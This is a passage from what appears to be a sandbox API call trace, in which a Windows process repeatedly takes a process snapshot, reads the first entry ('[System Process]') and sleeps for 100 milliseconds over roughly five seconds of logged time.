th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.089] Sleep (dwMilliseconds=0x64) [0265.090] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0265.103] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.163] Sleep (dwMilliseconds=0x64) [0265.167] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0265.181] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.362] Sleep (dwMilliseconds=0x64) [0265.402] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0265.415] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.516] Sleep (dwMilliseconds=0x64) [0265.518] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0265.532] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.606] Sleep (dwMilliseconds=0x64) [0265.608] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0265.644] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.713] Sleep (dwMilliseconds=0x64) [0265.718] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0265.728] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.783] Sleep (dwMilliseconds=0x64) [0265.787] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0265.799] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.854] Sleep (dwMilliseconds=0x64) [0265.857] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0265.873] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.940] Sleep (dwMilliseconds=0x64) [0265.943] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0265.957] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.068] Sleep (dwMilliseconds=0x64) [0266.073] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0266.086] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.187] Sleep (dwMilliseconds=0x64) [0266.189] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0266.202] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.299] Sleep (dwMilliseconds=0x64) [0266.302] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0266.315] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.370] Sleep (dwMilliseconds=0x64) [0266.371] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0266.383] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.454] Sleep (dwMilliseconds=0x64) [0266.456] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0266.470] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.540] Sleep (dwMilliseconds=0x64) [0266.543] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0266.558] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.629] Sleep (dwMilliseconds=0x64) [0266.632] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0266.647] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.715] Sleep (dwMilliseconds=0x64) [0266.717] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0266.733] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.807] Sleep (dwMilliseconds=0x64) [0266.808] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0266.822] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.971] Sleep (dwMilliseconds=0x64) [0266.973] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0266.986] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.098] Sleep (dwMilliseconds=0x64) [0267.100] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0267.118] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.194] Sleep (dwMilliseconds=0x64) [0267.214] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0267.225] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.299] Sleep (dwMilliseconds=0x64) [0267.301] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0267.313] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.380] Sleep (dwMilliseconds=0x64) [0267.382] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0267.396] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.454] Sleep (dwMilliseconds=0x64) [0267.456] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0267.467] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.524] Sleep (dwMilliseconds=0x64) [0267.526] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0267.539] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.622] Sleep (dwMilliseconds=0x64) [0267.624] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0267.638] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.693] Sleep (dwMilliseconds=0x64) [0267.695] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0267.707] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.774] Sleep (dwMilliseconds=0x64) [0267.775] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0267.787] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.841] Sleep (dwMilliseconds=0x64) [0267.846] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0267.861] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.916] Sleep (dwMilliseconds=0x64) [0267.919] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0267.932] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.048] Sleep (dwMilliseconds=0x64) [0268.051] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0268.094] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.185] Sleep (dwMilliseconds=0x64) [0268.189] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0268.207] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.295] Sleep (dwMilliseconds=0x64) [0268.298] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0268.313] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.381] Sleep (dwMilliseconds=0x64) [0268.385] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0268.407] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.468] Sleep (dwMilliseconds=0x64) [0268.471] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0268.482] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.545] Sleep (dwMilliseconds=0x64) [0268.549] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0268.560] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.611] Sleep (dwMilliseconds=0x64) [0268.615] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0268.628] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.680] Sleep (dwMilliseconds=0x64) [0268.685] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0268.696] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.758] Sleep (dwMilliseconds=0x64) [0268.762] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0268.776] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.832] Sleep (dwMilliseconds=0x64) [0268.834] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0268.845] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.908] Sleep (dwMilliseconds=0x64) [0268.911] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0268.922] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.976] Sleep (dwMilliseconds=0x64) [0268.978] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0269.026] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.078] Sleep (dwMilliseconds=0x64) [0269.080] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0269.094] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.149] Sleep (dwMilliseconds=0x64) [0269.152] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0269.162] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.219] Sleep (dwMilliseconds=0x64) [0269.220] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0269.230] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.400] Sleep (dwMilliseconds=0x64) [0269.402] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0269.413] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.466] Sleep (dwMilliseconds=0x64) [0269.469] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0269.481] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.541] Sleep (dwMilliseconds=0x64) [0269.544] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0269.560] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.617] Sleep (dwMilliseconds=0x64) [0269.619] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0269.635] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.691] Sleep (dwMilliseconds=0x64) [0269.694] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0269.708] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.760] Sleep (dwMilliseconds=0x64) [0269.763] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0269.773] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.831] Sleep (dwMilliseconds=0x64) [0269.833] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0269.845] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.910] Sleep (dwMilliseconds=0x64) [0269.912] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0269.925] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.024] Sleep (dwMilliseconds=0x64) [0270.027] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0270.040] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.104] Sleep (dwMilliseconds=0x64) [0270.110] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0270.123] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.181] Sleep (dwMilliseconds=0x64) [0270.182] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0270.195] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.252] Sleep (dwMilliseconds=0x64) [0270.254] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0270.265] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.321] Sleep (dwMilliseconds=0x64) [0270.323] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0270.364] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.436] Sleep (dwMilliseconds=0x64) [0270.438] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0270.451] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.517] Sleep 